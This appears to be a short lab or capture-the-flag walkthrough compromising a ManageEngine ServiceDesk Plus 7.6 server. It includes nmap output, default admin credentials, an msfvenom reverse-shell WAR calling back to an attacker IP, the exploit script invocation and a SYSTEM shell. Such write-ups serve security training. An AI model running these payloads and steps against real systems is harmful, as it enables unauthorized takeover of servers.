Enumeration
Nmap Scan
$ nmap $ip -sVC -oN nmapInitial.txt -PnStarting Nmap 7.92 ( https://nmap.org ) at 2021-11-12 09:17 +0545Nmap scan report for 192.168.80.43Host is up (0.19s latency).Not shown: 995 filtered tcp ports (no-response)PORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)3389/tcp open ms-wbt-server Microsoft Terminal Service8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1|_http-server-header: Apache-Coyote/1.1| http-cookie-flags:| /:| JSESSIONID:|_ httponly flag not set|_http-title: ManageEngine ServiceDesk PlusService Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2login with default credential
administrator:administratoron port 8080
zoho manageengine servicedesk plus 7.6 has authenticated arbitrary file upload vulnerability: exploit
$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.80 LPORT=445 -f war > shell.war
$ python3 ./manageengine_sd7-6.py $ip 8080 administrator administrator shell.war
$ rlwrap nc -nvlp 445listening on [any] 445 ...connect to [192.168.49.80] from (UNKNOWN) [192.168.80.43] 49196Microsoft Windows [Version 6.0.6001]Copyright (c) 2006 Microsoft Corporation. All rights reserved.C:\ManageEngine\ServiceDesk\bin>whoamiwhoamint authority\system